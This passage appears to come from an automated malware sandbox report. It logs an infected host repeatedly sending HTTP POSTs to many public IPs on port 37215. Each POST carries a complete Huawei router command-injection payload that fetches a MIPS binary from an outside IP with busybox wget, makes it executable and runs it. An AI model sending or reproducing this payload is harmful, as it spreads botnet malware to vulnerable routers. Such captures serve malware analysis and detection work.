6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  833192.168.2.1350598197.42.16.25437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.420229912 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  834192.168.2.1334970154.196.33.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.420291901 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  835192.168.2.1334902112.194.73.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.420336008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  836192.168.2.1350692157.127.25.15837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.420414925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  837192.168.2.1333862197.184.180.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.420437098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  838192.168.2.134851241.49.236.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.420507908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  839192.168.2.134672084.207.221.17737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.420525074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  840192.168.2.1338612157.210.177.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.420941114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  841192.168.2.135098441.179.198.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.421097994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  842192.168.2.134036641.26.231.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.421118021 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  843192.168.2.1335634197.55.163.22537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.421139956 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
